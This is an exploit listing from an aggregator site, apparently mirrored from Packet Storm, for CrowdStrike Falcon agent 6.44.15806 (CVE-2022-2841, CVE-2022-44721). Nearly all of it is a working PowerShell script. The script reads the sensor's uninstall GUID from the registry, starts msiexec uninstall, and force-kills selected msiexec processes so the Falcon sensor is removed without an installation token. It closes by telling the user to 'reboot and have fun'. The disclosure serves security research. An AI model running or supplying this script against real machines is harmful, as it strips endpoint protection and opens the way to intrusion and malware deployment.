Exploit for CrowdStrike Falcon Agent 6.44.15806 Uninstall Issue CVE-2022-2841 CVE-2022-44721

Name: Exploit for CrowdStrike Falcon Agent 6.44.15806 Uninstall Issue CVE-2022-2841 CVE-2022-44721
Rating: 5 (226 reviews)

2023-03-30 | CVSS 4.5

## https://sploitus.com/exploit?id=PACKETSTORM:171595
# Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token   
# Date: 30/11/2022   
# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team)   
# Vendor Homepage: https://www.crowdstrike.com/   
# Author Homepage: https://www.deda.cloud/   
# Tested On: All Windows versions   
# Version: 6.44.15806   
# CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress.   
  
  
$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"  
  
foreach($obj in $InstalledSoftware){  
if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))  
{  
$uninstall_uuid = $obj.Name.Split("\")[6]  
}  
}  
  
$g_msiexec_instances = New-Object System.Collections.ArrayList  
  
Write-Host "[+] Identified installed Falcon: $uninstall_uuid"  
Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."  
Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"  
  
while($true)  
{  
if (get-process -Name "CSFalconService") {  
Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {  
  
if (-Not $g_msiexec_instances.contains($_.id)){  
$g_msiexec_instances.Add($_.id)  
if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){  
Start-Sleep -Milliseconds 100  
Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]  
stop-process -Force -Id $g_msiexec_instances[-1]   
}  
  
}  
  
}  
} else {   
Write-Host "[+] CSFalconService process vanished...reboot and have fun!"  
break  
}  
}